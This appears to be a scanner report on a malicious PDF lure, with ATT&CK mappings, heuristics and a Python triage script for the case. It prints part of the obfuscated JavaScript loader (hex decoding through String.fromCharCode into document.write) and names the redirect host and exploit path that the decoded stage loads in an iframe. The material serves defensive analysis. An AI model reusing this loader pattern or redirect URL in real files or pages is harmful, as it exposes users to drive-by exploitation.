Verdict: MALICIOUS
Risk score: 60

Malware Insights

MITRE ATT&CK
- T1059.007 Command and Scripting Interpreter: JavaScript (the embedded stage is browser-style JavaScript; the report's own heuristic notes the absence of Windows shell-execution primitives, so a PowerShell mapping is not supported by the evidence)
- T1566.001 Phishing: Spearphishing Attachment (T1566.001 is the attachment sub-technique; T1566.002 is Spearphishing Link)
The PDF declares encryption, but static analysis still recovered an embedded script payload. The script hex-encodes its real body and rebuilds it two hex digits at a time with String.fromCharCode; the visible start of the decoded stage is <SCRIPT>window.status='Done';. Once decoded, the stage constructs an iframe whose src is 'http://reddii.ru/traffic/sployt1/sp1.php?' followed by Math.round(Math.random()*11845), a random query value that defeats caching and exact-URL blocking, so block on the host or path rather than the full URL. This indicates the PDF is a lure that redirects the user to a malicious site, potentially for further exploitation or credential harvesting. Note that document.write and iframe are browser DOM constructs, not part of the Acrobat JavaScript API, so this stage only runs where the bytes are rendered by an HTML engine; the decoded URL is the indicator worth acting on regardless.
Machine Learning
- Nyx PDF Classifier malicious score 0.9994
Heuristics (3)
- Embedded script payload in PDF stream (medium, PDF_EMBEDDED_SCRIPT_PAYLOAD): PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives. Common in accessible XFA forms, but worth surfacing for analyst review.
- String.fromCharCode (low, PDF_FROMCHARCODE): String.fromCharCode found; used to construct payload strings dynamically. Common in benign JavaScript libraries for codepoint manipulation, so this alone is informational; weaponised use is also caught by the dedicated fromCharCode-stage and exploit-shape rules. Matched line in script (the binary bytes of the /O and /U strings are shown as [binary]):
  endobj 19 0 obj<</R 2/Length 40/Filter/Standard/O([binary])/P -60/U([binary]<script>function vbYbdxtdtxd(vtydbdadxax){ return(parseInt(vtydbdadxax,16));}function vxVtydaabba(vayaVVabdYY){ var vVatbayydtY='';for(vxtYxdydYYV=0; vxtYxdydYYV<vayaVVabdYY.length; vxtYxdydYYV+=2){vVatbayydtY+=(String.fromCharCode(vbYbdxtdtxd(vayaVVabdYY.substr(vxtYxdydYYV,2))));}return vVatbayydtY;} document.write(vxVtydaabba('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F …
- Encrypted PDF (info, PDF_ENCRYPTED): PDF declares /Encrypt; string objects and stream contents are encrypted with the standard security handler (RC4 or AES), so static heuristics cannot inspect encrypted payload bytes. On its own this is informational: legitimate encrypted documents include signed contracts, billing statements and rights-managed material. In this sample the dictionary reads /R 2 /Length 40, i.e. revision 2 of the standard handler with a 40-bit RC4 key, and the /P value -60 allows printing but denies modification, copying and annotation. The <script> text itself was recovered in plaintext, so the object carrying it was not opaque to the scanner.
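As a worked triage example added here (it is not part of the analyzer's output or its rule set), the script below reproduces what the three heuristics look for and carries the fromCharCode stage one step further by decoding the hex literal. The sample bytes are constructed: they carry the same /Encrypt dictionary values (/R 2, /Length 40, /P -60) and the same script text as the matched line above, with ASCII placeholders instead of the binary /O and /U strings, and the hex literal closed at the prefix visible on this page, so the decoded output is only the start of the stage and the iframe URL described in the summary is not reproduced. The rule name DECODED_STAGE_WRITES_SCRIPT is a hypothetical label used only in this example.

```python
import re

# Constructed sample (not the real file): same /Encrypt dictionary values and the
# same script text as the matched line in the report; the /O and /U strings are
# ASCII placeholders and the hex literal is closed at the prefix shown on the page.
SAMPLE = (
    b"19 0 obj<</R 2/Length 40/Filter/Standard"
    b"/O(placeholder-O-string-32-bytes-long!!)/P -60"
    b"/U(placeholder-U-string-32-bytes-long!!)>>endobj\n"
    b"20 0 obj<</Length 420>>stream\n"
    b"<script>function vbYbdxtdtxd(vtydbdadxax){ return(parseInt(vtydbdadxax,16));}"
    b"function vxVtydaabba(vayaVVabdYY){ var vVatbayydtY='';"
    b"for(vxtYxdydYYV=0; vxtYxdydYYV<vayaVVabdYY.length; vxtYxdydYYV+=2){"
    b"vVatbayydtY+=(String.fromCharCode(vbYbdxtdtxd(vayaVVabdYY.substr(vxtYxdydYYV,2))));}"
    b"return vVatbayydtY;} document.write(vxVtydaabba("
    b"'3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F'));</script>\n"
    b"endstream\nendobj\n"
)

SCRIPT_RE = re.compile(rb"<script>(.*?)</script>", re.I | re.S)
HEX_LITERAL_RE = re.compile(rb"['\"]([0-9A-Fa-f]{16,})['\"]")

# /P is a 32-bit two's-complement bit field; bit numbers follow the PDF spec.
PERMISSION_BITS = {3: "print", 4: "modify", 5: "copy", 6: "annotate"}


def parse_standard_encrypt(data):
    """Pull revision, key length and /P out of a standard security handler
    dictionary, or return None when the file declares no such handler."""
    m = re.search(rb"/Filter\s*/Standard", data)
    if m is None:
        return None
    window = data[max(0, m.start() - 256):m.end() + 256]

    def field(name, default):
        f = re.search(rb"/" + name + rb"\s+(-?\d+)", window)
        return int(f.group(1)) if f else default

    revision = field(b"R", 2)
    key_bits = field(b"Length", 40)  # spec default when /Length is absent
    if revision <= 3:
        cipher = "RC4"
    elif revision == 4:
        cipher = "RC4 or AES-128 (see /CF)"
    else:
        cipher = "AES-256"
    return {"revision": revision, "key_bits": key_bits, "cipher": cipher,
            "permissions": field(b"P", -1)}


def permissions(p):
    """Expand the /P value into the four user-facing permission flags."""
    p &= 0xFFFFFFFF
    return {name: bool(p & (1 << (bit - 1))) for bit, name in PERMISSION_BITS.items()}


def decode_hex_pairs(blob):
    """Mirror of the page's decoder: two hex digits -> one character, stepping by
    two; an odd trailing digit is consumed alone, as substr(i, 2) would do."""
    text = blob.decode("ascii")
    return "".join(chr(int(text[i:i + 2], 16)) for i in range(0, len(text), 2))


def find_script_payloads(data):
    """Locate <script> bodies and the long quoted hex literals inside them."""
    found = []
    for m in SCRIPT_RE.finditer(data):
        body = m.group(1)
        found.append({"offset": m.start(),
                      "fromCharCode": b"fromCharCode" in body,
                      "hex_blobs": [h.group(1) for h in HEX_LITERAL_RE.finditer(body)]})
    return found


def triage(data):
    """Apply the three heuristics from the report plus one decoded-stage check
    (DECODED_STAGE_WRITES_SCRIPT is a hypothetical label for this example)."""
    enc = parse_standard_encrypt(data)
    scripts = find_script_payloads(data)
    decoded = [decode_hex_pairs(b) for s in scripts for b in s["hex_blobs"]]
    findings = []
    if enc:
        findings.append("PDF_ENCRYPTED")
    if scripts:
        findings.append("PDF_EMBEDDED_SCRIPT_PAYLOAD")
    if any(s["fromCharCode"] for s in scripts):
        findings.append("PDF_FROMCHARCODE")
    if any("<script" in d.lower() for d in decoded):
        findings.append("DECODED_STAGE_WRITES_SCRIPT")
    return {"encryption": enc, "scripts": scripts, "decoded": decoded,
            "findings": findings}


if __name__ == "__main__":
    result = triage(SAMPLE)
    print(result["encryption"], permissions(result["encryption"]["permissions"]))
    for stage in result["decoded"]:
        print("decoded stage:", stage)
    print("findings:", result["findings"])
```

The decoded stage for the visible prefix is <SCRIPT>window.status='Done';do, which is why a fromCharCode hit that decodes to a second <script> tag deserves a higher weight than the informational PDF_FROMCHARCODE rule alone gives it. Real files will usually need the stream decompressed (FlateDecode) before the <script> regex sees anything, and a genuinely encrypted stream has to be decrypted with the recovered key first; this example only handles the plaintext case the report actually observed.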
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| embedded_pdf_script_00000325.bin | pdf-embedded-script | PDF decompressed stream script payload at offset 0x325 | 58 bytes | a7c962ec478d5348e3cd62abde37058c6ff2a011fcf4e46b79217e98b417a57a |

Preview (first 1,000 lines of the extracted script; the leading binary bytes from the /U string are shown as [binary]):
[binary]M<script>function vbYbdxtdtxd(vtydbdadxax